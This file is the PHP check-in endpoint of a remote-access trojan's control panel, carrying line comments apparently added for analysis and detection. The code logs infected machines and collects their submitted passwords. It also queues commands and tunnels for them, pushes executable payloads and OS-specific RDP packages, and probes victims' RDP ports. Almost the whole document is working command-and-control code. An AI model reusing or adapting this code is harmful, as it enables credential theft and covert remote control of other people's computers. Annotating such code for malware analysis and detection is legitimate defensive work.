- <? // Check-in endpoint of a remote-control panel (the file's own names: "bot", "RAT"); comments added for analysis and detection.
- error_reporting(0); // all PHP diagnostics are suppressed, so the only output is what the script echoes or passes to die()
- define(XTERM_CFG_DIR,$_SERVER["DOCUMENT_ROOT"]."/_xtcfg2"); // config directory sits under the web root at /_xtcfg2
- include XTERM_CFG_DIR."/maincfg.php"; // SQLShield, SQLConnect, IsTunnelSet and the *_LOG / *_DIR constants are not defined in this file; presumably they come from this include - confirm
- //error_reporting(E_ALL);
- if((empty($_POST["q"]))||(empty($_POST["id"]))) die("main"); // every request must POST "q" (request type) and "id" (client id); otherwise the whole response body is "main"
- if($_POST["q"]!="l") if((empty($_POST["o"]))||(empty($_POST["v"]))) die("main2"); // all types except "l" also need "o" (OS version string) and "v" (client version); otherwise "main2"
- $dwQType=$_POST["q"];
- $szID=SQLShield($_POST["id"]); // SQLShield is not shown here, so what it filters cannot be assessed from this file
- $szRATVer=SQLShield($_POST["v"]);
- if($_POST["q"]!="l"){
- $rgVer=explode(":",SQLShield($_POST["o"])); //platf:mj:mn:build:sp-mj:sp-mn:suite:type:bits:csdver (colon-separated; indexes 0..9 in that order)
- if(count($rgVer)<10) die("ver"); // fewer than 10 fields: reply "ver" and stop
- }
- //-------------------------
- function BotLog($szText){ // Appends one line, "dd.mm.YYYY HH:MM <text>", to the file named by the BOTS_LOG constant.
- if(!($hFile=fopen(BOTS_LOG,"a+"))) return; // returns silently when the log cannot be opened
- fputs($hFile,strftime("%d.%m.%Y %H:%M")." ".$szText."\n");
- fclose($hFile);
- }
- function AccessLog($szText){ // Same line format as BotLog, written to ACCESS_LOG, and only when ACCESS_LOG_ENABLED is defined.
- if(!defined("ACCESS_LOG_ENABLED")) return; // access logging is opt-in via a constant defined elsewhere
- if(!($hFile=fopen(ACCESS_LOG,"a+"))) return; // returns silently when the log cannot be opened
- fputs($hFile,strftime("%d.%m.%Y %H:%M")." ".$szText."\n");
- fclose($hFile);
- }
- function IsBotExist($szID){ // Fetches the xt2_alive row whose bid equals $szID; returns it as an associative array, or NULL if absent or if the query fails.
- if(!($r=mysql_query("SELECT * FROM xt2_alive WHERE bid='$szID'"))){ // $szID is placed into the SQL text as-is; the callers in this file pass it through SQLShield (not shown) first
- BotLog("SQL Exist failed: ".mysql_error()); // query errors end up in the BOTS_LOG file
- return NULL;
- }
- if(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgRow=$row; else $rgRow=NULL; // only the first matching row is used
- mysql_free_result($r);
- return $rgRow;
- }
- function AddBot($szID,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS){ // Inserts a new xt2_alive row for a client with no existing row.
- $q="INSERT INTO xt2_alive (bid,ctime,atime,uptime,rip,lip,user,country,lang,os_ver,bot_ver,bflags,tstate) VALUES "; // column list doubles as the record schema: id, created/last-seen times, uptime, remote and local IP, user, country, language, OS, client version, flags, ts state
- $q.="('$szID',NOW(),NOW(),'$dwUptime','$szRIP','$szLIP','$szUser','$szCountry','$szLang','$szOS','$szBotVer','$dwFlags','$szTS')"; // ctime and atime both start at NOW()
- if(mysql_query($q)) return;
- BotLog("SQL Add failed: ($q) ".mysql_error()); // on failure the full query text, including the submitted values, is written to the bot log
- }
- function UpdateBot($rgRow,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS){ // Refreshes an existing xt2_alive row with the latest check-in values; atime becomes NOW(), ctime is left alone.
- $q="UPDATE xt2_alive SET atime=NOW(),uptime='$dwUptime',rip='$szRIP',lip='$szLIP',user='$szUser',country='$szCountry',lang='$szLang',os_ver='$szOS',";
- $q.="bot_ver='$szBotVer',bflags=$dwFlags,tstate='$szTS' "; // bflags is written unquoted, unlike the other values
- $q.="WHERE bid='".$rgRow['bid']."'"; // the row is matched on the bid value read back from the database, not on the posted id
- if(mysql_query($q)) return;
- BotLog("SQL Update failed: ($q) ".mysql_error()); // on failure the full query text and the MySQL error go to the bot log
- }
- function UpdateMsg($szID,$szMsg){ // Stores the client's message in the reply column of its row, prefixed with "[dd.mm.YYYY HH:MM:SS] ".
- mysql_query("UPDATE xt2_alive SET reply='".strftime("[%d.%m.%Y %H:%M:%S] ")."$szMsg' WHERE bid='$szID'"); // the query result is not checked or logged
- }
- function UpdateLP($rgRow,$szID,$szNewPass){ // Appends $szNewPass to the row's semicolon-separated passwds column unless that value is already listed.
- if($rgRow){
- $szPassList=$rgRow["passwds"];
- $rgPasswds=explode(';',$szPassList);
- foreach($rgPasswds as $szOldPass) if($szOldPass==$szNewPass) return; // loose == comparison against each stored entry; nothing is written on a match
- }else $szPassList=""; // no existing row: start from an empty list
- $szPassList.="$szNewPass;";
- $rgRow["passwds"]=$szPassList; // changes only the local copy, because $rgRow is passed by value
- mysql_query("UPDATE xt2_alive SET passwds='$szPassList' WHERE bid='$szID'"); // the query result is not checked or logged
- }
- function SendFile($szFile,$szCmd,$dwUPID,$fDel=false){ // Streams $szFile to the client as a download preceded by a command prefix, then ends the request; returns an error string only if the file is missing or cannot be opened.
- if(!file_exists($szFile)) return "No such file $szFile";
- $dwSize=filesize($szFile);
- if(!($hFile=fopen($szFile,"r"))) return "Can't open $szFile";
- header("Cache-control: private");
- header("Content-Type: application/octet-stream");
- header("Content-Length: ".($dwSize+5+1+1+8)); //+ <WEB>+X : file size plus 15 bytes; presumably the 6-byte "<WEB>+" marker the callers echo, the 1-byte command and the 8-byte id - confirm
- header("Content-Disposition: attachment; filename=\"".mktime().".exe\""); // download name is the current Unix time plus ".exe"
- if((strlen($dwUPID)==8)&&($dwUPID=="smss_fix")) echo sprintf("%s%s",$szCmd,$dwUPID); else echo sprintf("%s%08X",$szCmd,($dwUPID+0)); // prefix is $szCmd followed by either the literal "smss_fix" or the id as 8 uppercase hex digits
- fpassthru($hFile); // rest of the body is the raw file content
- fclose($hFile);
- if($fDel) unlink($szFile); // one-shot delivery: the file is removed from the server after sending
- AccessLog($_SERVER["REMOTE_ADDR"]." Sent $szFile"); // client address and file path are recorded when access logging is enabled
- die; // the request ends here, so callers get a return value only on the two error paths above
- }
- function UpdateVersion($szBotVer){ // Compares the client's version with the current_xt_ver setting and sends the configured update file when they differ and the client is not newer; does not return after a successful send.
- if(!($r=mysql_query("SELECT * FROM xt2_cfg"))) return NULL;
- $rgCfg=array();
- while(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgCfg[$row["name"]]=$row["val"]; // xt2_cfg is read as a name => val settings table
- mysql_free_result($r);
- $dwBotVer=0+preg_replace("/(\d)\.(\d)\.(\d+).*/","$1$2$3",$szBotVer); // "a.b.c..." becomes the integer abc; anything after the third number is dropped
- $dwCurrentVer=0+preg_replace("/(\d)\.(\d)\.(\d+).*/","$1$2$3",$rgCfg["current_xt_ver"]);
- if(($dwBotVer>100)&&($dwCurrentVer>100)&&($dwBotVer>=$dwCurrentVer)) return NULL; // numeric check applies only when both values exceed 100; client is current or newer, so no update
- if($szBotVer==$rgCfg["current_xt_ver"]) return NULL; // identical version strings: no update
- if((!strchr($rgCfg["update_file"],"/"))&&(!strchr($rgCfg["update_file"],"\\"))) $rgCfg["update_file"]=UPDATE_DIR.$rgCfg["update_file"]; // a bare file name is taken relative to UPDATE_DIR; a value containing a slash or backslash is used as given
- return SendFile($rgCfg["update_file"],"U",$rgCfg["update_id"],false); // command prefix "U" plus the update_id setting; reached only when SendFile returns an error string
- }
- function CustomUpload($szBotID){ // Looks in xt2_cfg for a file queued for this one client, removes the queue entry and sends the file; returns NULL when nothing is queued.
- if(!($r=mysql_query("SELECT * FROM xt2_cfg WHERE name like 'upl_%' AND val like '$szBotID:%' LIMIT 1"))) return NULL; // queue entries are settings named upl_* whose value starts with "<client id>:"
- if(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgUpl=explode(':',$row["val"]); else $rgUpl=NULL; // value layout as used below: field 1 is the id sent to the client, field 2 the file name
- mysql_free_result($r);
- if(!$rgUpl) return NULL;
- mysql_query("DELETE FROM xt2_cfg WHERE id=".$row["id"]); // the entry is deleted before the send is attempted
- return SendFile(UPDATE_DIR.$rgUpl[2],"U",$rgUpl[1],true); // last argument true: the file is also deleted from UPDATE_DIR after it is sent
- }
- function CheckMSRDP($szIP){ // Returns TRUE if a TCP connection from this server to $szIP on port 3389 succeeds within 10 seconds, otherwise FALSE.
- if(!($hSock=fsockopen($szIP,3389,&$err,&$strerr,10))) return FALSE; // call-time pass-by-reference (&$err) is a fatal error from PHP 5.4 on, which dates this code to older PHP
- fclose($hSock); // nothing is sent or read; only the connect result matters
- return TRUE;
- }
- function Alive($szID,$rgVer,$szCountry,$szLang,$dwUptime,$szBotVer,$szLIP,$szUser,$szMsg,$szTS){ // Handles a type "a" check-in: records the client, stores its message and lp values, then replies with "<WEB>+" followed by any queued command, tunnel entry or file.
- $szRIP=$_SERVER["REMOTE_ADDR"]; // remote IP is the address the request arrived from
- $dwFlags=0;
- $szOS=implode(":",$rgVer);
- //Check RDP: the server connects back to the requesting address on TCP 3389 (see CheckMSRDP)
- if(!empty($szLIP)){
- if(($szLIP==$_SERVER["REMOTE_ADDR"])&&($szTS=="OK")) if(CheckMSRDP($_SERVER["REMOTE_ADDR"])) $dwFlags|=0x00000001; // flag bit 0 is set when the reported local IP equals the source address, ts is "OK" and the port answers
- }else if(CheckMSRDP()) $dwFlags|=0x00000001; // no local IP reported: CheckMSRDP is called here without an address argument
- SQLConnect(); // defined outside this file
- if(!($rgRow=IsBotExist($szID))) AddBot($szID,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS);
- else UpdateBot($rgRow,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS);
- if(!empty($szMsg)) UpdateMsg($szID,$szMsg);
- //LP: POST fields lp0..lp11 are appended to the passwds column by UpdateLP
- for($i=0;$i<12;$i++) if(!empty($_POST["lp$i"])) UpdateLP($rgRow,$szID,SQLShield($_POST["lp$i"])); else break; // stops at the first missing or empty lpN
- //--Reply--
- echo "<WEB>+"; // fixed marker that starts every reply from this handler
- if($rgRow){ // queued items exist only for clients that already had a row
- if(!empty($rgRow["send_cmd"])) echo $rgRow["send_cmd"]; // queued command text is sent as stored
- if(($rgTun=IsTunnelSet($rgRow["send_tun"]))) echo "T".$rgTun[0].":".$rgTun[4].":".$rgTun[5].";"; // IsTunnelSet is defined elsewhere; the reply carries "T" plus its elements 0, 4 and 5
- mysql_query("UPDATE xt2_alive SET send_tun=NULL,send_cmd=NULL WHERE bid='$szID'"); // both queue columns are cleared once delivered
- }
- //Check update,dies on update
- if(($s=UpdateVersion($szBotVer))) BotLog("[U] $s"); // a non-empty return is an error string from SendFile
- if(($s=CustomUpload($szID))) BotLog("[L] $s");
- if($_POST["smss"]=="fix"){ // optional POST field smss=fix requests the file smss.fix from CABS_DIR
- if(($s=SendFile(CABS_DIR."smss.fix","U","smss_fix",FALSE))) BotLog("[F] $s");
- }
- die;
- }
- function SendPack($szID,$rgVer,$szBotVer,$szMsg){ // Handles a type "i" request: records the client, then picks a .cab package from CABS_DIR by the reported OS version fields and sends it with command prefix "R".
- $szOS=implode(":",$rgVer);
- SQLConnect(); // defined outside this file
- if(!($rgRow=IsBotExist($szID))) AddBot($szID,0,$_SERVER["REMOTE_ADDR"],"","","","",$szOS,$szBotVer,0,""); // only id, source address, OS and client version are known at this stage
- else UpdateBot($rgRow,0,$_SERVER["REMOTE_ADDR"],"","","","",$szOS,$szBotVer,0,""); // an existing row has its other fields overwritten with empty values
- if(!empty($szMsg)) UpdateMsg($szID,$szMsg);
- echo "<WEB>+"; // fixed marker that starts every reply from this handler
- if(($s=UpdateVersion($szBotVer))) BotLog("[U] $s"); // an update or a queued upload takes priority: SendFile ends the request on success
- if(($s=CustomUpload($szID))) BotLog("[L] $s");
- switch($rgVer[1]){ // index 1 is the OS major version ("mj" in the field list where $rgVer is parsed)
- case "4":
- case "5":
- if($rgVer[2]=="0"){ //2000
- $szPack=CABS_DIR."5.0-2.32.cab";
- }else if($rgVer[2]=="2"){ //5.2
- if($rgVer[7]!=1){ //2003 (index 7 is the "type" field; presumably 1 means workstation - confirm)
- if($rgVer[8]==64) $szPack=CABS_DIR."5.2.64-s.cab"; else $szPack=CABS_DIR."5.0-2.32.cab"; // index 8 is the bit width
- }else $szPack=CABS_DIR."5.2.64-c.cab";
- }else{ //5.1
- if($rgVer[4]=="3") $szPack=CABS_DIR."5.1.32-s3.cab"; else $szPack=CABS_DIR."5.1.32.cab"; // index 4 is the service pack major number
- }
- break;
- case "6":
- if($rgVer[8]==64) $szPack=CABS_DIR."6.x.64.cab"; else $szPack=CABS_DIR."6.x.32.cab";
- break;
- default:
- BotLog("[C] Unknown version of $szID ($szOS): $r"); // $r has not been assigned at this point
- die("X"); // unsupported major version: the reply is "<WEB>+X"
- break;
- }
- $r=SendFile($szPack,"R",0,false); // ends the request on success; returns an error string otherwise
- BotLog("[C] File not found $szPack for $szID ($szOS): $r"); // reached only when the package could not be sent
- die("X");
- }
- //-------------------------
- switch($dwQType){ // dispatch on the "q" POST field; any other value falls through and produces no output
- case "i": //Get RDP pack
- AccessLog($_SERVER["REMOTE_ADDR"]." Pack file request: ".implode('|',$_POST)); // the whole POST body, pipe-joined, is logged when access logging is enabled
- SendPack($szID,$rgVer,$szRATVer,SQLShield($_POST["msg"]));
- break;
- case "a": //Alive
- $szLIP=SQLShield($_POST["lip"]);
- $szTS=SQLShield($_POST["ts"]);
- if((empty($_POST["l"]))||(empty($_POST["c"]))||(!isset($_POST["t"]))) die; // "l" (language), "c" (country) and "t" (uptime) are required; otherwise an empty response
- AccessLog($_SERVER["REMOTE_ADDR"]." Alive ".implode('|',$_POST));
- Alive($szID,$rgVer,SQLShield($_POST["c"]),SQLShield($_POST["l"]),SQLShield($_POST["t"]),$szRATVer,$szLIP,SQLShield($_POST["u"]),SQLShield($_POST["msg"]),$szTS); // "u" is the user name, "lip" the local IP, "ts" the state compared with "OK" in Alive
- break;
- case "l": //DebugLog
- if(!isset($_FILES["f0"])) die; // the client uploads one file in the multipart field f0
- AccessLog($_SERVER["REMOTE_ADDR"]." Log from $szID");
- $rgFile=$_FILES["f0"];
- if(!move_uploaded_file($rgFile["tmp_name"],XTERM_CFG_DIR."/logs/_debug-$szID.".sprintf("%08X",mktime()).".log")) die; // stored under the config directory as logs/_debug-<id>.<time as 8 hex digits>.log
- mysql_query("UPDATE xt2_alive SET send_cmd=NULL WHERE bid='".$szID."'"); // clears the queued command; no SQLConnect() call is visible on this path
- die("ok"); // success reply is the bare string "ok", without the "<WEB>+" marker
- break;
- }
- ?>